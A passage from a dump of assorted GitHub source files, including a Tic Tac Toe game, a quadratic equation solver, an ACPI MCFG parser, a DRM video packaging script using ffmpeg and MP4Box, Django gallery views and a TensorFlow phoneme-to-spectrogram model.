Tac Toe game.')\n print(draw_board(board))\n\n while not is_board_full(board):\n # Checking for the computer\n if not winner_check(board, 'O'):\n player_move()\n print(draw_board(board))\n else:\n os.system('clear')\n print(draw_board(board))\n print('Sorry, you lose.')\n break\n \n # Checking for the player\n if not winner_check(board, 'X'):\n position = computer_move()\n if position == 0:\n os.system('clear')\n print(draw_board(board))\n print(\"Tie game.\")\n else:\n os.system('clear')\n insert_letter('O', position)\n print(f\"Computer placed an O on position {position}.\")\n print(draw_board(board))\n else:\n os.system('clear')\n print(draw_board(board))\n print('You win!')\n break\n\n\nmain()\nwhile True:\n user = input(\"Do you want to play again? 
Y/N: \")\n if user.lower() == 'y':\n board = [' ' for _ in range(10)]\n print('-----------------------------------')\n main()\n else:\n break","repo_name":"angeloxlan/python-bootcamp","sub_path":"tic_tac_toe/tic_tac_toe.py","file_name":"tic_tac_toe.py","file_ext":"py","file_size_in_byte":4879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"19073474057","text":"from turboCoeff import similarity\n\n# data\n# constraints\nmFlux = 100 # mass flux [kg/s]\nbetaP = 1.45 # compression ratio [--]\nmaxD = 0.9 # maximum tip diameter [m]\nmaxR = maxD/2 # maximum tip radius [m]\n\n# inlet values\nPt0 = 1e+5 # inlet total pressure [Pa]\nTt0 = 300 # inlet total temperature [K]\n\n# choosed quantities\nrD = 0.58\nrMean = 0.32\n\n# mean line properties study \nV0vec, V1vec, V2vec, bladeVec, rotationVec = similarity.propertiesStudy(mFlux, betaP, Pt0, Tt0, input=[rD, rMean], rDmin=0.5, rDmax=0.73, rMeanMin=0.25, rMeanMax=0.4, Vt0Umean=0, plot=False, save=True, position='latex/figures/rMeanChi.pdf')\n\n# data allocation \nVa0 = V0vec[0]\nVt0 = V0vec[1]\nVa1 = V1vec[0]\nVt1 = V1vec[1]\nomega = rotationVec[1]\nbladeHeight = bladeVec[0]\nhubRadius = rMean - bladeHeight/2\nrMean = [rMean, rMean]\nVtMean = [Vt0, Vt1]\nVaMean = [Va0, Va1]\n\nWtTarget = 0\nbVal = (WtTarget + omega * hubRadius - Vt1 * rMean[1]/hubRadius)/(hubRadius - rMean[1]**2/hubRadius)\nb = [0, bVal]\n\ndef func(r):\n Vt2new = Vt1 * (rMean[1] / r)**-0.6\n\n return Vt2new\n\n# angle and velocity study along the blade span\nsimilarity.deltaAngleStudy(hubRadius, bladeHeight, rMean, VtMean, VaMean, omega, kind=['FV', 'MVD'], a=[0,0], b=b, n=[0,0], nSection=50, save=True, position='latex/figures/betaAngles.pdf')\n\n# data allocation \nVa1 = V1vec[0]\nVt1 = V1vec[1]\nVa2 = V2vec[0]\nVt2 = V2vec[1]\nVtMean = [Vt1, Vt2]\nVaMean = [Va1, Va2]\n\nbVal = (omega - Vt1 * rMean[1]/hubRadius**2)/(1 - rMean[1]**2/hubRadius**2)\nWtTarget = -omega*hubRadius*1.5*0\nbVal1 = (WtTarget + omega * hubRadius - Vt1 * rMean[1]/hubRadius)/(hubRadius - rMean[1]**2/hubRadius)\nb = [bVal1, 0]\nomega = 0\n\nVtTarget = 30\ndef func(r):\n a = 4 * VtTarget / bladeHeight**2\n Vt = a * (r - rMean[1])**2\n\n return Vt\n\n# stator angles and velocity study \nsimilarity.deltaAngleStudy(hubRadius, bladeHeight, rMean, VtMean, VaMean, omega, kind=['MVD', 'eqn'], a=[0,0], b=b, n=[0,0], nSection=50, func2=func, save=True, position='latex/figures/alphaAngles.pdf')\n","repo_name":"antoniopucciarelli/turboLIB","sub_path":"similarityStudy.py","file_name":"similarityStudy.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"79"} +{"seq_id":"19300604213","text":"# Реализовать скрипт, который решает квадратное уравнение вида 𝑎𝑥2 + 𝑏𝑥 + 𝑐 = 0.\n# Параметры квадратного уравнения 𝑎, 𝑏, 𝑐 задаются вводом или через аргументы командной строки.\n# В скрипте реализовать несколько функций, которые декомпозируют задачу решения квадратного\n# уравнения. В эти функции должны передаваться параметры. 
Также на эти функций написать UnitTests.\n# Основной скрипт solv_square_equation.py должен иметь следующие функции:\n# - main()\n# - validate_param(int) - проверяет, что введено число, повторяет ввод 3 раза если не число\n# (использовать exception)\n# - discriminant(a, b, c)\n# - roots(d, a, b, c)\n# - solv_square(a, b, c) -> roots\n# - square_print(a, b, c, roots) – выводит на экран результат\n# на выделенные написать UnitTest.\n# Не использовать глобальные переменные.\n\ndef validate_param(int):\n i = 0\n while True:\n try:\n int = int(input()) \n except ValueError:\n print(\"Not an integer! Try again.\")\n if i == 2:\n break\n else:\n i += 1\n continue\n else:\n return int \n break \n\ndef discriminant(a, b, c):\n d = (b ** 2) - (4 * a * c)\n roots (d, a, b, c)\n return d\n\ndef roots(d, a, b, c):\n # если D < 0, корней нет;\n # если D = 0, есть один корень;\n # если D > 0, есть два различных корня.\n #print('i am from roots ' + str(a) + str(b) + str(c) + str(d) )\n if d < 0:\n print('Quadratic equation have not roots')\n return 'd < 0'\n elif d == 0:\n #х = −b/2a\n root = -b/(2*a)\n print('Quadratic equation have 1 roots '+ str(root) + ' from quadratic equation '+ str(a) + 'x**2' + '+' + '(' + str(b) + ')' + 'x' + '+' + '(' + str(c) + ')' '=0')\n return 'd == 0'\n elif d > 0:\n print('Quadratic equation have two roots')\n solv_square(a, b, c)\n return 'd > 0'\n \n\ndef solv_square(a, b, c):\n d = (b**2) - (4*a*c)\n root1 = (-b + (d**0.5))/(2*a)\n root2 = (-b - (d**0.5))/(2*a)\n roots = str(root1) +' and '+ str(root2)\n square_print(a, b, c, roots)\n return root1,root2\n\ndef square_print(a, b, c, roots):\n print('Roots are: ' + str(roots) + ' from quadratic equation '+ str(a) + 'x**2' + '+' + '(' + str(b) + ')' + 'x' + '+' + '(' + str(c) + ')' '=0' )\n #return None\n\ndef main():\n print('Enter fist member A: ')\n a = validate_param(int)\n #print(a)\n if a == 0:\n print('Bad way for quadratic equation a=0')\n exit\n elif a != None:\n print('Enter fist member B: ')\n b = validate_param(int)\n #print(b) \n print('Enter fist member C: ')\n c = validate_param(int)\n #print(c) \n discriminant(a, b, c)\n else:\n exit\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"dmalyshok/DevOps_online_Kiev_2021Q4","sub_path":"m8/task8.1/solv_square_equation.py","file_name":"solv_square_equation.py","file_ext":"py","file_size_in_byte":3342,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"2349329704","text":"import tensorflow as tf\nimport numpy as np\nfrom scipy import stats\nfrom tensorflow.examples.tutorials.mnist import input_data\n\nmnist = input_data.read_data_sets(\"/tmp/data/\", one_hot=True)\nX_train,y_train = mnist.train.next_batch(5000)\nX_test, y_test = mnist.test.next_batch(100)\nk=3\ntarget_x= tf.placeholder(\"float\",[1784])\nX = tf.placeholder(\"float\",[None, 784])\ny = tf.placeholder(\"float\",[None, 10])\nl1_dist = tf.reduce_sum(tf.abs(tf.sub(x, target_x)), 1)\nl2_dist = tf.reduce_sum(tf.square(tf.sub(x, target_x)), 1)\nnn = tf.nn.top_k(-l1_dist, k)\ninit = tf.initialize_all_variables()\naccuracy_history = []\nwith tf.Session() as sess:\n\tsess.run(init)\n","repo_name":"somiljain7/AI","sub_path":"KNN-ALGORITHM/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"2751562811","text":"#\r\n# AcpiMcfg.py\r\n#\r\n# Copyright (C) 2018 efipy.core@gmail.com All rights reserved.\r\n#\r\n# AcpiMcfg.py 
is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, version 2 of the License.\r\n#\r\n# AcpiMcfg.py is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with EfiPy. If not, see .\r\n#\r\n\r\nimport EfiPy\r\nfrom EfiPyAcpiBase import AcpiTables\r\nfrom EfiPy.MdePkg.IndustryStandard import EFIPY_INDUSTRY_STRUCTURE\r\nfrom EfiPy.MdePkg.IndustryStandard.MemoryMappedConfigurationSpaceAccessTable import EFI_ACPI_MEMORY_MAPPED_ENHANCED_CONFIGURATION_SPACE_BASE_ADDRESS_ALLOCATION_STRUCTURE as MCFG_ENTRY\r\nfrom EfiPy.MdePkg.IndustryStandard.MemoryMappedConfigurationSpaceAccessTable import EFI_ACPI_MEMORY_MAPPED_CONFIGURATION_BASE_ADDRESS_TABLE_HEADER as MCFG_HEADER\r\n\r\nMcfgSize = 0\r\nMcfgAddress = 0\r\n\r\nfor _signature, _address, _size in AcpiTables:\r\n if _signature == 'MCFG':\r\n McfgAddress = _address\r\n _McfgHeader = MCFG_HEADER.from_address (McfgAddress)\r\n McfgSize = _size\r\n break;\r\n\r\nif McfgAddress == 0:\r\n raise ImportError ('MCFG Not found')\r\n\r\nclass MCFG_TABLE_CLASS (EFIPY_INDUSTRY_STRUCTURE):\r\n _fields_ = [\r\n (\"Header\", MCFG_HEADER),\r\n (\"McfgEntry\", MCFG_ENTRY * ((McfgSize - EfiPy.sizeof (MCFG_HEADER)) / EfiPy.sizeof (MCFG_ENTRY)))\r\n ]\r\n\r\nAddress = McfgAddress\r\nSize = McfgSize\r\nTable = MCFG_TABLE_CLASS.from_address (McfgAddress)\r\nRevision = Table.Header.Header.Revision","repo_name":"melxman/UEFI-BIOS-Flasher","sub_path":"StdLib/lib/python.27/site-packages/EfiPyLib/Acpi/AcpiMcfg.py","file_name":"AcpiMcfg.py","file_ext":"py","file_size_in_byte":1808,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"35797760965","text":"import blog_poller\nimport ubw_poller\nimport traceback\nimport yr_poller\n\n\ndef lambda_handler(event, context):\n # This is a list of polling methods that should be run once every day.\n pollings = [\n ubw_poller.poll,\n blog_poller.poll,\n yr_poller.poll,\n ]\n errors = 0\n for poll in pollings:\n try:\n poll()\n except:\n # If one of the polling methods fails it should not stop the others from running.\n traceback.print_exc()\n errors += 1\n\n if errors == 0:\n return {\n 'statusCode': 200,\n 'body': ''\n }\n\n else:\n return {\n 'statusCode': 500,\n 'body': ''\n }\n","repo_name":"Tinusf/Dataplattform","sub_path":"services/poller/daily_poller/daily_poller.py","file_name":"daily_poller.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"79"} +{"seq_id":"4015730929","text":"import softwareprocess.Angle as A\n\nclass Longitude(A.Angle):\n def setDegreesFloat(self, degNum):\n longitudeTooLowStr = 'The longitude specified is too low! It must be greater than or equal to 0 degrees and 0.0 minutes'\n longitudeTooHighStr = 'The longitude specified is too high! 
It must be less than 360 degrees and 0.0 minutes'\n if isinstance(degNum, (int, float, long)):\n if degNum < 0:\n raise ValueError(longitudeTooLowStr)\n elif degNum >= 360:\n raise ValueError(longitudeTooHighStr)\n A.Angle.setDegreesFloat(self, degNum)","repo_name":"agupta7/COMP6700","sub_path":"softwareprocess/angles/Longitude.py","file_name":"Longitude.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8112662685","text":"#imports\nimport subprocess\nimport os,binascii\nimport xml.etree.ElementTree as ET\nimport json\nimport os, errno\nimport shutil\ndef execute( bash_command ): #for running bash command\n # to remove any output\n # p = subprocess.Popen(bash_command, stdout=subprocess.PIPE) \n p = subprocess.Popen(bash_command) \n (output, err) = p.communicate()\n print(err)\n return err\n\ndef createdir( path ): #for creating any directory\n try:\n try:\n original_umask = os.umask(0)\n os.makedirs(path, 0o777)\n finally:\n os.umask(original_umask)\n except OSError as e:\n if e.errno != errno.EEXIST:\n raise\n\nbitrates = { \"700\":288, \"1000\":360, \"1500\":480, \"2000\":576 }\noffbitrate = \"1000\"\n\npath = './video_upload'\nfiles = os.listdir(path)\nfor name in files:\n\n #variable names\n x,y = os.path.splitext(name)\n vidName = x\n \n createdir('./video_uploaded/' + vidName)\n\n #split source file to audio and video\n \n command = [\"ffmpeg\", \"-i\", \"./video_upload/\"+vidName+\".mp4\" ,\"-c:v\" ,\"copy\", \"-an\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video.mp4\"]\n execute(command)\n command = [\"ffmpeg\", \"-i\", \"./video_upload/\"+vidName+\".mp4\" ,\"-c:a\" ,\"copy\", \"-vn\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-audio.mp4\"]\n execute(command)\n\n #change to different bitrates\n\n #scale=\"trunc(oh*a/2)*2:720\"\n\n for bitrate in bitrates:\n # wierd = '''\"scale='trunc(oh*a/2)*2:'''+str(bitrates[bitrate])+\"'\\\"\"\n wierd = '''scale='trunc(oh*a/2)*2:'''+str(bitrates[bitrate])+\"'\"\n # wierd = \"scale=\\\"trunc(oh*a/2)*2:360\\\"\"\n command = [\"ffmpeg\", \"-i\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video.mp4\", \"-an\", \"-c:v\" ,\"libx264\",\"-preset\", \"veryslow\" ,\"-profile:v\", \"high\", \"-level\", \"4.2\", \"-b:v\", bitrate+\"k\", \"-minrate\", bitrate+\"k\", \"-maxrate\", bitrate+\"k\", \"-bufsize\", str(int(bitrate)*2)+\"k\", \"-g\", \"96\", \"-keyint_min\", \"96\", \"-sc_threshold\", \"0\", \"-filter:v\", wierd, \"-pix_fmt\", \"yuv420p\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+bitrate+\"k.mp4\"]\n execute(command)\n\n #make new keys and add to json\n\n KID = \"0x\" + str(binascii.b2a_hex(os.urandom(16)).upper())\n val = \"0x\" + str(binascii.b2a_hex(os.urandom(16)).upper())\n\n entry = {\n \"value\": val, \n \"kid\": KID\n }\n with open(\"./video_uploaded/\"+vidName+\"/\"+vidName+\".json\", mode='w') as feedsjson:\n json.dump(entry, feedsjson)\n\n # change keys in crypt.xml\n\n crypt = ET.parse('crypt.xml')\n elem = crypt.getroot()\n elem[1][0].attrib[\"KID\"] = KID\n elem[1][0].attrib[\"value\"] = val\n crypt.write('crypt.xml')\n\n #encrypt files using clearkey encryption\n\n for bitrate in bitrates:\n command = [\"MP4Box\", \"-crypt\", \"crypt.xml\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+bitrate+\"k.mp4\", \"-out\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+bitrate+\"k-encrypted.mp4\"]\n execute(command)\n # for audio\n execute([\"MP4Box\", \"-crypt\", \"crypt.xml\", 
\"./video_uploaded/\"+vidName+\"/\"+vidName+\"-audio.mp4\", \"-out\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-audio-encrypted.mp4\"])\n\n #create folder\n createdir('./video_online/'+vidName+'/dash')\n createdir('./video_offline/'+vidName+'/dash')\n\n #online\n\n command = [\"MP4Box\", \"-dash\", \"4000\", \"-rap\", \"-frag-rap\", \"-sample-groups-traf\", \"-profile\", \"dashavc264:live\", \"-bs-switching\", \"multi\", \"-url-template\"]\n\n for bitrate in bitrates:\n command.append(\"video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+bitrate+\"k-encrypted.mp4\")\n command.append(\"video_uploaded/\"+vidName+\"/\"+vidName+\"-audio-encrypted.mp4\")\n command.append(\"-out\")\n command.append(\"video_online/\"+vidName+\"/dash/manifest.mp4\")\n execute(command)\n\n #offline\n\n command = [\"MP4Box\", \"-dash\",\"4000\", \"-rap\", \"-frag-rap\", \"-sample-groups-traf\", \"-profile\", \"dashavc264:live\", \"-bs-switching\", \"no\", \"-url-template\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-video-\"+offbitrate+\"k-encrypted.mp4#video\", \"./video_uploaded/\"+vidName+\"/\"+vidName+\"-audio-encrypted.mp4#audio\", \"-out\", \"video_offline/\"+vidName+\"/dash/manifest.mp4\"]\n execute(command)\n\n print(\"Completed \" + vidName + \" :)\") \n #upload to s3 bucket script\n\n\n\n #shift file to video_uploaded folder\n shutil.move(\"./video_upload/\" + vidName + \".mp4\", \"./video_uploaded\")\n\n","repo_name":"shero4/drmvideo","sub_path":"python-script/script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":4360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12229446867","text":"from django.shortcuts import render, redirect \nfrom .models import Gallery, Exhibition\nfrom .forms import ExhibitionForm\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import login\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.http import JsonResponse\n\ndef home(request):\n return render(request, 'home.html')\n\ndef about(request):\n return render(request, 'about.html')\n\ndef signup(request):\n error_message = ''\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n login(request, user)\n return redirect('home')\n else:\n error_message = 'Invalid sign up - try again'\n form = UserCreationForm()\n context = {'form': form, 'error_message': error_message}\n return render(request, 'registration/signup.html', context)\n\ndef galleries_index(request):\n galleries = Gallery.objects.all()\n return render(request, 'galleries/galleries_index.html', {\n 'galleries': galleries\n })\n\ndef galleries_detail(request, gallery_id):\n gallery = Gallery.objects.get(id=gallery_id)\n exhibitions = Exhibition.objects.filter(gallery_id=gallery_id).order_by('-id')\n exhibition_form = ExhibitionForm()\n return render(request, 'galleries/galleries_detail.html', { 'gallery': gallery, 'exhibitions': exhibitions, 'exhibition_form': exhibition_form })\n\n@login_required\ndef exhibition_create(request, gallery_id):\n if request.method == 'POST':\n form = ExhibitionForm(request.POST)\n if form.is_valid():\n new_exhibition = form.save(commit=False)\n new_exhibition.gallery_id = gallery_id\n new_exhibition.user = request.user\n new_exhibition.save()\n else:\n print(form.errors)\n return redirect('galleries_detail', gallery_id=gallery_id)\n\n@login_required\ndef save_exhibition(request, exhibition_id):\n try:\n exhibition = 
Exhibition.objects.get(id=exhibition_id)\n exhibition.user_favourite = True\n exhibition.user = request.user\n exhibition.save()\n return JsonResponse({\"success\": True})\n except Exhibition.DoesNotExist:\n return JsonResponse({\"success\": False})\n \ndef exhibitions_saved(request):\n user = request.user\n saved_exhibitions = Exhibition.objects.filter(user=user, user_favourite=True).order_by('-id')\n return render(request, 'exhibitions/exhibitions_saved.html', {'saved_exhibitions': saved_exhibitions})\n\n@login_required\ndef delete_exhibition(request, exhibition_id):\n try:\n exhibition = Exhibition.objects.get(id=exhibition_id)\n exhibition.user_favourite = False\n exhibition.save()\n return JsonResponse({\"success\": True})\n except Exhibition.DoesNotExist:\n return JsonResponse({\"success\": False})","repo_name":"gellisun/side-project","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"753029924","text":"# -*- coding: utf-8 -*-\n# /usr/bin/python2\n\nfrom __future__ import print_function\nimport glob\nimport argparse\nimport sys\nimport os.path\nimport time\n\nfrom scipy import signal\nimport librosa\nimport numpy as np\nimport tensorflow as tf\n\nimport hyperparams as hp\n\nimport matplotlib.pyplot as plt\n\n\nnum_classes = 61\nnum_mags = hp.Default.n_fft / 2 + 1\n\n# HYPER PARAMETERS\nTRAIN_CAP = 1000\nTEST_CAP = 500\nNUM_LAYERS = 5\nNUM_HIDDEN = 100\nLEARNING_RATE = 0.01\nNUM_EPOCHS = 100\nBATCH_SIZE = 20\nKEEP_PROB = 0.9\n\nSAVE_DIR = \"./checkpoint2/save\"\nPLOTTING = True\n\nSAVE_PER_EPOCHS = 1\nRESAMPLE_PER_EPOCHS = 10\n\n\ndef db_to_amplitude(x):\n return 10.0**(x / 10.0)\n\n\ndef preemphasis(x, coeff=0.97):\n '''\n Applies a pre-emphasis filter on x\n '''\n return signal.lfilter([1, -coeff], [1], x)\n\n\ndef deemphasis(x, coeff=0.97):\n return signal.lfilter([1], [1, -coeff], x)\n\n\ndef load_vocab():\n '''\n Returns:\n phn2idx - A dictionary containing phoneme string to index mappings\n idx2phn - A dictionary containing index to phoneme mappings (reverse of phn2idx)\n '''\n phns = ['h#', 'aa', 'ae', 'ah', 'ao', 'aw', 'ax', 'ax-h', 'axr', 'ay', 'b', 'bcl',\n 'ch', 'd', 'dcl', 'dh', 'dx', 'eh', 'el', 'em', 'en', 'eng', 'epi',\n 'er', 'ey', 'f', 'g', 'gcl', 'hh', 'hv', 'ih', 'ix', 'iy', 'jh',\n 'k', 'kcl', 'l', 'm', 'n', 'ng', 'nx', 'ow', 'oy', 'p', 'pau', 'pcl',\n 'q', 'r', 's', 'sh', 't', 'tcl', 'th', 'uh', 'uw', 'ux', 'v', 'w', 'y', 'z', 'zh']\n # Phoneme to index mapping\n phn2idx = {phn: idx for idx, phn in enumerate(phns)}\n # Index to phoneme mapping\n idx2phn = {idx: phn for idx, phn in enumerate(phns)}\n\n return phn2idx, idx2phn\n\n\ndef _get_mfcc_log_spec_and_log_mel_spec(wav, preemphasis_coeff, n_fft, win_length, hop_length):\n '''\n Args:\n wav - Wave object loaded using librosa\n\n Returns:\n mfcc - coefficients\n mag - magnitude spectrum\n mel\n '''\n # Pre-emphasis\n y_preem = preemphasis(wav, coeff=preemphasis_coeff)\n\n # Get spectrogram\n D = librosa.stft(y=y_preem, n_fft=n_fft,\n hop_length=hop_length, win_length=win_length)\n mag = np.abs(D)\n\n # Get mel-spectrogram\n mel_basis = librosa.filters.mel(\n hp.Default.sr, hp.Default.n_fft, hp.Default.n_mels) # (n_mels, 1+n_fft//2)\n mel = np.dot(mel_basis, mag) # (n_mels, t) # mel spectrogram\n\n # Get mfccs\n db = librosa.amplitude_to_db(mel)\n mfccs = np.dot(librosa.filters.dct(hp.Default.n_mfcc, db.shape[0]), db)\n\n # Log\n mag = np.log(mag + 
sys.float_info.epsilon)\n mel = np.log(mel + sys.float_info.epsilon)\n\n # Normalization\n # self.y_log_spec = (y_log_spec - hp.mean_log_spec) / hp.std_log_spec\n # self.y_log_spec = (y_log_spec - hp.min_log_spec) / (hp.max_log_spec - hp.min_log_spec)\n\n return mfccs.T, mag.T, mel.T # (t, n_mfccs), (t, 1+n_fft/2), (t, n_mels)\n\n\ndef get_mags_and_phones(wav_file, sr, trim=False, random_crop=False, length=int(hp.Default.duration / hp.Default.frame_shift + 1)):\n '''\n This is applied in `train1` or `test1` phase.\n\n args:\n wav_file - wave filename\n sr - sampling ratio\n trim - remove 0th index from mfccs[] and phns[]\n random_crop - retrieve a `length` segment from a random starting point\n length - used with `random_crop`\n '''\n\n # Load\n wav, sr = librosa.load(wav_file, sr=sr)\n\n _, mags, _ = _get_mfcc_log_spec_and_log_mel_spec(wav, hp.Default.preemphasis, hp.Default.n_fft,\n hp.Default.win_length,\n hp.Default.hop_length)\n # timesteps\n num_timesteps = mags.shape[0]\n\n # phones (targets)\n phn_file = wav_file.replace(\"wav\", \"lab\")\n phn2idx, idx2phn = load_vocab()\n phns = np.zeros(shape=(num_timesteps,))\n bnd_list = []\n for line in open(phn_file, 'r').read().splitlines():\n if(line != \"#\"):\n start_time, _, phn = line.split()\n bnd = int(float(start_time) * sr // hp.Default.hop_length)\n phns[bnd:] = phn2idx[phn]\n bnd_list.append(bnd)\n\n # Replace pau with h# for consistency with TIMIT\n phns[phns == 44.] = 0.\n\n # Trim\n if trim:\n start, end = bnd_list[1], bnd_list[-1]\n mags = mags[start:end]\n phns = phns[start:end]\n assert (len(mags) == len(phns))\n\n # # Random crop\n # if random_crop:\n # start = np.random.choice(\n # range(np.maximum(1, len(mfccs) - length)), 1)[0]\n # end = start + length\n # mfccs = mfccs[start:end]\n # phns = phns[start:end]\n # assert (len(mfccs) == len(phns))\n\n # # Padding or crop\n # mfccs = librosa.util.fix_length(mfccs, length, axis=0)\n # phns = librosa.util.fix_length(phns, length, axis=0)\n return mags, phns\n\n\ndef load_test_data(phn_file):\n phn2idx, idx2phn = load_vocab()\n phns = np.zeros(shape=(10000,))\n bnd_list = []\n bnd_list.append(0)\n prev_bnd = 0\n for line in open(phn_file, 'r').read().splitlines():\n # For TIMIT files\n # start_point, end_point, phn = line.split()\n # bnd = int(start_point) // hp.Default.hop_length\n # phns[bnd:] = phn2idx[phn]\n # bnd_list.append(bnd)\n # For Arctic files\n if(line != \"#\"):\n end_time, _, phn = line.split()\n bnd = int(float(end_time) * hp.Default.sr // hp.Default.hop_length)\n phns[prev_bnd:bnd] = phn2idx[phn]\n bnd_list.append(bnd)\n prev_bnd = bnd\n phns[phns == 44.] 
= 0.\n start, end = bnd_list[0], bnd_list[-1]\n phns = phns[start:end]\n return np.array([phns])\n\n\ndef get_arguments():\n parser = argparse.ArgumentParser()\n parser.add_argument('predict_file', type=str, help='predict file path')\n optional = parser.add_argument_group('hyperparams')\n optional.add_argument('--nh', type=int, required=False,\n help='number of hidden nodes')\n optional.add_argument('--nl', type=int, required=False,\n help='number of lstm layers')\n optional.add_argument('--epochs', type=int, required=False,\n help='number of epochs')\n optional.add_argument('--batch_size', type=int,\n required=False, help='BATCH_SIZE')\n arguments = parser.parse_args()\n global NUM_HIDDEN, NUM_LAYERS, NUM_EPOCHS, BATCH_SIZE\n if arguments.nh:\n NUM_HIDDEN = arguments.nh\n if arguments.nl:\n NUM_LAYERS = arguments.nl\n if arguments.epochs:\n NUM_EPOCHS = arguments.epochs\n if arguments.batch_size:\n BATCH_SIZE = arguments.batch_size\n return arguments\n\n\ndef one_hot(indices, depth=num_classes):\n one_hot_labels = np.zeros((len(indices), depth))\n one_hot_labels[np.arange(len(indices)), indices] = 1\n return one_hot_labels\n\n\ndef set_parameters(nh, nl, epochs, batch_size, keep_prob):\n global NUM_HIDDEN, NUM_LAYERS, NUM_EPOCHS, BATCH_SIZE, KEEP_PROB\n NUM_HIDDEN = nh\n NUM_LAYERS = nl\n NUM_EPOCHS = epochs\n BATCH_SIZE = batch_size\n KEEP_PROB = keep_prob\n\n\ndef spectrogram2wav(mag, n_fft, win_length, hop_length, num_iters, phase_angle=None, length=None):\n assert(num_iters > 0)\n if phase_angle is None:\n phase_angle = np.pi * np.random.rand(*mag.shape)\n spec = mag * np.exp(1.j * phase_angle)\n for i in range(num_iters):\n wav = librosa.istft(spec, win_length=win_length,\n hop_length=hop_length, length=length)\n if i != num_iters - 1:\n spec1 = librosa.stft(\n wav, n_fft=n_fft, win_length=win_length, hop_length=hop_length)\n _, phase = librosa.magphase(spec1)\n phase_angle = np.angle(phase)\n spec = mag * np.exp(1.j * phase_angle)\n return deemphasis(wav)\n\n\nif __name__ == '__main__':\n args = get_arguments()\n predict_file = args.predict_file\n\n graph = tf.Graph()\n with graph.as_default():\n # Input placeholder of shape [BATCH_SIZE, num_frames, num_phn_classes]\n inputs = tf.placeholder(tf.float32, [None, None, num_classes])\n\n # Target placeholder of shape [BATCH_SIZE, num_frames, num__mfcc_features]\n targets = tf.placeholder(tf.int32, [None, None, num_mags])\n\n # List of sequence lengths (num_frames)\n seq_len = tf.placeholder(tf.int32, [None])\n\n keep_prob = tf.placeholder(tf.float32, shape=())\n\n mean = tf.Variable(-3.643601)\n\n std_dev = tf.Variable(2.283052)\n\n # Get a GRU cell with dropout for use in RNN\n def get_a_cell(gru_size, keep_prob=1.0):\n gru = tf.nn.rnn_cell.GRUCell(gru_size)\n drop = tf.nn.rnn_cell.DropoutWrapper(\n gru, output_keep_prob=keep_prob)\n return drop\n\n # Make a multi layer RNN of NUM_LAYERS layers of cells\n stack = tf.nn.rnn_cell.MultiRNNCell(\n [get_a_cell(NUM_HIDDEN, keep_prob) for _ in range(NUM_LAYERS)])\n\n # outputs is the output of the RNN at each time step (frame)\n # RNN has NUM_HIDDEN output nodes\n # outputs has shape [BATCH_SIZE, num_frames, NUM_HIDDEN]\n # The second output is the last state and we will not use that\n (output_fw, output_bw), _ = tf.nn.bidirectional_dynamic_rnn(\n stack, stack, inputs, seq_len, dtype=tf.float32)\n outputs = tf.concat([output_fw, output_bw], axis=2)\n\n # Save input shape for restoring later\n shape = tf.shape(inputs)\n batch_s, max_timesteps = shape[0], shape[1]\n\n # Reshaping to apply the 
same weights over the timesteps\n # outputs is now of shape [BATCH_SIZE*num_frames, NUM_HIDDEN]\n # So the same weights are trained for each timestep of each sequence\n outputs = tf.reshape(outputs, [-1, 2 * NUM_HIDDEN])\n\n # Truncated normal with mean 0 and stdev=0.1\n # Tip: Try another initialization\n # see https://www.tensorflow.org/versions/r0.9/api_docs/python/contrib.layers.html#initializers\n W = tf.Variable(tf.truncated_normal([2 * NUM_HIDDEN,\n num_mags],\n stddev=0.1))\n # Zero initialization\n b = tf.Variable(tf.constant(0., shape=[num_mags]))\n\n # Doing the affine projection\n predictions = tf.matmul(outputs, W) + b\n\n # Reshaping back to the original shape\n predictions = tf.reshape(predictions, [batch_s, -1, num_mags])\n\n scaled_predictions = predictions * std_dev + mean\n\n # mse_loss = tf.reduce_mean(\n # tf.losses.mean_squared_error(\n # predictions=predictions, labels=targets))\n # define an accuracy assessment operation\n mse_loss = tf.losses.mean_squared_error(predictions, targets)\n\n optimizer = tf.train.AdamOptimizer(\n LEARNING_RATE).minimize(mse_loss)\n\n # finally setup the initialisation operator\n init_op = tf.global_variables_initializer()\n\n with tf.Session(graph=graph) as sess:\n saver = tf.train.Saver()\n SAVE_PATH = SAVE_DIR + '_mag_bigru_{}_{}_{}_{}_{}/model.ckpt'.format(\n NUM_HIDDEN, 